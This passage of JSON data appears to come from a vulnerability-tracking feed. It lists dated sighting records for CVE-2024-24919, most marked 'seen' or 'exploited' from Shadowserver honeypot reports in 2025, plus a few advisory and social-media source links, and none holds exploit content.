"The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-01)", "content": "", "creation_timestamp": "2025-05-01T00:00:00.000000Z"}, {"uuid": "0cd850d3-16da-41ce-bb93-8b9a119c5d47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-03)", "content": "", "creation_timestamp": "2025-05-03T00:00:00.000000Z"}, {"uuid": "cde6c9b6-3104-4581-b56a-965b4e71d199", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-04)", "content": "", "creation_timestamp": "2025-05-04T00:00:00.000000Z"}, {"uuid": "85638c9a-573e-45af-b1a6-eb1085be1c04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-02)", "content": "", "creation_timestamp": "2025-05-02T00:00:00.000000Z"}, {"uuid": "fb059117-cbf4-4f50-b842-7a2d8f451fa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-04)", "content": "", "creation_timestamp": "2025-05-04T00:00:00.000000Z"}, {"uuid": "8a8e8986-1bff-4538-86b2-5995314025cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "4a219ef7-679e-4fff-8009-8ce48d1f08b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-05)", "content": "", "creation_timestamp": "2025-05-05T00:00:00.000000Z"}, {"uuid": "3a2a4a3e-aa88-45a3-826f-07d7093a5403", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "1a5eb3c5-6ba9-4f8a-8e91-0f7a1a969b31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-09)", "content": "", "creation_timestamp": "2025-05-09T00:00:00.000000Z"}, {"uuid": "d3841d4d-7d9c-4e80-99e7-82a9a4ae0d7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-20)", "content": "", "creation_timestamp": "2025-06-20T00:00:00.000000Z"}, {"uuid": "dca6c0c8-fdf4-4a33-b237-9da33e483cad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-12)", "content": "", "creation_timestamp": "2025-05-12T00:00:00.000000Z"}, {"uuid": "c3ca24db-51dd-4469-b3a6-23277284b6df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-20)", "content": "", "creation_timestamp": "2025-05-20T00:00:00.000000Z"}, {"uuid": "cdbd3945-e1e4-44eb-ae35-f63cb08d3d04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-17)", "content": "", "creation_timestamp": "2025-07-17T00:00:00.000000Z"}, {"uuid": "3de5d38a-575b-4c0b-a85f-1c39a335202c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-15)", "content": "", "creation_timestamp": "2025-06-15T00:00:00.000000Z"}, {"uuid": "edd3d259-6981-4f45-908f-611167c645dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-04)", "content": "", "creation_timestamp": "2025-11-04T00:00:00.000000Z"}, {"uuid": "e1d55d58-c578-485c-910a-f637eeb48661", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-18)", "content": "", "creation_timestamp": "2025-10-18T00:00:00.000000Z"}, {"uuid": "c4515232-3df7-484b-9eb6-6f8db587feb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-01)", "content": "", "creation_timestamp": "2025-10-01T00:00:00.000000Z"}, {"uuid": "7a4b2bbc-efd8-48fe-9a10-6dff538f1d81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-24)", "content": "", "creation_timestamp": "2025-09-24T00:00:00.000000Z"}, {"uuid": "fe1a1131-72fc-42d3-aa96-067207780ac1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-16)", "content": "", "creation_timestamp": "2025-07-16T00:00:00.000000Z"}, {"uuid": "2bb0e66a-9d86-4e50-ba9c-0732abddb3e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-21)", "content": "", "creation_timestamp": "2025-07-21T00:00:00.000000Z"}, {"uuid": "6d49ebeb-c058-4c12-9590-8abe69d8b357", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-23)", "content": "", "creation_timestamp": "2025-07-23T00:00:00.000000Z"}, {"uuid": "330a9820-e5af-401d-a9b5-e837a799c5e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-01)", "content": "", "creation_timestamp": "2025-10-01T00:00:00.000000Z"}, {"uuid": "eaf5e103-9851-4954-ac16-76db8c35c338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-09-12)", "content": "", "creation_timestamp": "2025-09-12T00:00:00.000000Z"}, {"uuid": "96a4cc78-5a12-4eca-8bea-2b6e5a3b5faf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-17)", "content": "", "creation_timestamp": "2025-11-17T00:00:00.000000Z"}, {"uuid": "b99e4d35-7990-419e-8c97-4f5e0a5f43f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-24)", "content": "", "creation_timestamp": "2025-07-24T00:00:00.000000Z"}, {"uuid": "5cb4b0d0-bbde-4817-a00e-2d0fa7302561", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-13)", "content": "", "creation_timestamp": "2025-10-13T00:00:00.000000Z"}, {"uuid": "03c104ea-1af4-47f1-b377-e021824a5c06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-21)", "content": "", "creation_timestamp": "2025-11-21T00:00:00.000000Z"}, {"uuid": "44834704-31e4-46ed-a5bd-9d51d1bc9391", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-25)", "content": "", "creation_timestamp": "2025-07-25T00:00:00.000000Z"}, {"uuid": "7fe33874-0090-49ae-afeb-bf0d1039fd77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-29)", "content": "", "creation_timestamp": "2025-10-29T00:00:00.000000Z"}, {"uuid": "f7f7408d-cdbd-4d3c-be7a-54c348d8d874", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:02.000000Z"}, {"uuid": "b0945b7e-d58a-4f37-afd3-e1b60941a430", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-26)", "content": "", "creation_timestamp": "2025-07-26T00:00:00.000000Z"}, {"uuid": "b2dbe696-9e46-46f6-9124-30805400ccfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-21)", "content": "", "creation_timestamp": "2025-10-21T00:00:00.000000Z"}, {"uuid": "92e1c382-3f6f-4048-a08a-569f8383b8a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-06)", "content": "", "creation_timestamp": "2025-10-06T00:00:00.000000Z"}, {"uuid": "09869ca5-4e89-42ff-9f85-60d29576e79b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-24)", "content": "", "creation_timestamp": "2025-07-24T00:00:00.000000Z"}, {"uuid": "c102182b-05c4-43ff-a737-d5e99460c399", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-27)", "content": "", "creation_timestamp": "2025-10-27T00:00:00.000000Z"}, {"uuid": "d156b68e-2117-4666-a430-ce6ca648de80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-27)", "content": "", "creation_timestamp": "2025-07-27T00:00:00.000000Z"}, {"uuid": "88ea8f1b-bd47-4017-a2ec-1a6215444abe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-15)", "content": "", "creation_timestamp": "2025-10-15T00:00:00.000000Z"}, {"uuid": "0152d23b-efa2-4995-8b28-8c9656b58bb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-28)", "content": "", "creation_timestamp": "2025-07-28T00:00:00.000000Z"}, {"uuid": "b8b1ed85-7296-4368-b782-6b5f3a279d3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-29)", "content": "", "creation_timestamp": "2025-10-29T00:00:00.000000Z"}, {"uuid": "3e5d8472-efbd-4612-837d-69aa558d73ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-28)", "content": "", "creation_timestamp": "2025-07-28T00:00:00.000000Z"}, {"uuid": "c869c4b0-c0ac-4762-801d-d1b8e9f78279", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-09)", "content": "", "creation_timestamp": "2025-09-09T00:00:00.000000Z"}, {"uuid": "0361daca-7b11-41a6-8ad2-c34d96d90214", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-01)", "content": "", "creation_timestamp": "2025-08-01T00:00:00.000000Z"}, {"uuid": "969e8318-6545-4435-8ca8-96ca883ead9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-01)", "content": "", "creation_timestamp": "2025-08-01T00:00:00.000000Z"}, {"uuid": "d7fbf266-0851-4f2a-8bef-167ca5135304", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-04)", "content": "", "creation_timestamp": "2025-08-04T00:00:00.000000Z"}, {"uuid": "6de23468-a022-4c1e-87cb-fd5a49d7ebc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-15)", "content": "", "creation_timestamp": "2025-10-15T00:00:00.000000Z"}, {"uuid": "2812d08b-03d5-4048-99aa-ae84707501e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-02)", "content": "", "creation_timestamp": "2025-10-02T00:00:00.000000Z"}, {"uuid": "fa3c6cfc-7e8e-4332-8b81-923f1e1e3c7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-29)", "content": "", "creation_timestamp": "2025-07-29T00:00:00.000000Z"}, {"uuid": "1c289622-1555-4c75-99aa-f65fd522ed19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://bsky.app/profile/cyberalerts.bsky.social/post/3lv6jyk7uut23", "content": "", "creation_timestamp": "2025-07-30T11:40:16.256375Z"}, {"uuid": "996c1b47-5084-4480-b6b0-17e4bf975064", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-15)", "content": "", "creation_timestamp": "2025-11-15T00:00:00.000000Z"}, {"uuid": "96982b3e-0e92-4c98-bebc-12fe7b5918dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-09-13)", "content": "", "creation_timestamp": "2025-09-13T00:00:00.000000Z"}, {"uuid": "cad48542-7d51-49b9-a360-6d8c1a131035", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-20)", "content": "", "creation_timestamp": "2025-11-20T00:00:00.000000Z"}, {"uuid": "1fc315b3-c67d-41b4-b020-e900405e6908", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-24919", "type": "seen", "source": "https://www.cert.at/de/warnungen/2024/5/sicherheitslucke-in-check-point-network-security-gateways-mobile-access-fix-verfugbar", "content": "", "creation_timestamp": "2024-05-29T17:17:29.000000Z"}, {"uuid": "b8f68b22-2e11-41b2-aaba-5a4861bbed03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-05)", "content": "", "creation_timestamp": "2025-08-05T00:00:00.000000Z"}, {"uuid": "cbb249b9-2d86-48ca-9bdd-155b95adcb0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-19)", "content": "", "creation_timestamp": "2025-10-19T00:00:00.000000Z"}, {"uuid": "ceef7a0e-a578-4437-bb2d-260cfeeb87dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-31)", "content": "", "creation_timestamp": "2025-10-31T00:00:00.000000Z"}, {"uuid": "8a39c640-4428-45f0-9a3f-dc4667af7b53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-03)", "content": "", "creation_timestamp": "2025-11-03T00:00:00.000000Z"}, {"uuid": "22422a71-9b00-4617-b34e-7f03f1d2e031", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-07)", "content": "", "creation_timestamp": "2025-08-07T00:00:00.000000Z"}, {"uuid": "5266e3de-311d-4ae4-8f71-202d4d08c862", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-13)", "content": "", "creation_timestamp": "2025-09-13T00:00:00.000000Z"}, {"uuid": "d7f2f7a4-1de3-4482-b0ef-43f9cccddb79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-02)", "content": "", "creation_timestamp": "2025-10-02T00:00:00.000000Z"}, {"uuid": "0008b751-2736-437a-a2d4-047621c0d7b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-03)", "content": "", "creation_timestamp": "2025-11-03T00:00:00.000000Z"}, {"uuid": "b8d1785a-48a1-4fcf-ae70-151e00640e6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-20)", "content": "", "creation_timestamp": "2025-11-20T00:00:00.000000Z"}, {"uuid": "88ca1524-fd3e-4600-8019-37c5d942557b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-06)", "content": "", "creation_timestamp": "2025-09-06T00:00:00.000000Z"}, {"uuid": "b53dcea1-7898-4473-83f6-89b28b0ebc8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-08)", "content": "", "creation_timestamp": "2025-08-08T00:00:00.000000Z"}, {"uuid": "3b7fbbfd-dbae-4c23-ada7-2083c4ebfa78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-01)", "content": "", "creation_timestamp": "2025-12-01T00:00:00.000000Z"}, {"uuid": "c11c395e-3e4b-444a-b00d-b88c1e6ce4c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-10)", "content": "", "creation_timestamp": "2025-08-10T00:00:00.000000Z"}, {"uuid": "be17b2d5-5f15-4532-980c-74453edfd1d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-14)", "content": "", "creation_timestamp": "2025-09-14T00:00:00.000000Z"}, {"uuid": "0551e027-8163-49ea-84e7-06af8db0bb64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-08)", "content": "", "creation_timestamp": "2025-10-08T00:00:00.000000Z"}, {"uuid": "3054b90d-0718-44ff-8158-ab7e08582328", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-06)", "content": "", "creation_timestamp": "2025-11-06T00:00:00.000000Z"}, {"uuid": "f4955a16-463e-4c81-b3ef-fa81100cf93d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-10)", "content": "", "creation_timestamp": "2025-08-10T00:00:00.000000Z"}, {"uuid": "2d5488b7-eb46-43a4-a02c-a18e717b9cdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-01)", "content": "", "creation_timestamp": "2025-11-01T00:00:00.000000Z"}, {"uuid": "2df61929-772a-4862-a5bb-1467bb976222", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-11)", "content": "", "creation_timestamp": "2025-08-11T00:00:00.000000Z"}, {"uuid": "ff3174e3-e38c-4070-8606-91f71ce7bbc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-11)", "content": "", "creation_timestamp": "2025-08-11T00:00:00.000000Z"}, {"uuid": "10bf3c13-2001-4cfd-94eb-7543313c4612", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-12)", "content": "", "creation_timestamp": "2025-08-12T00:00:00.000000Z"}, {"uuid": "4fb4ac93-097c-49d9-b831-4190fb4a6ff3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-09)", "content": "", "creation_timestamp": "2025-08-09T00:00:00.000000Z"}, {"uuid": "0d247733-133c-493d-9f53-d4f02b36784a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 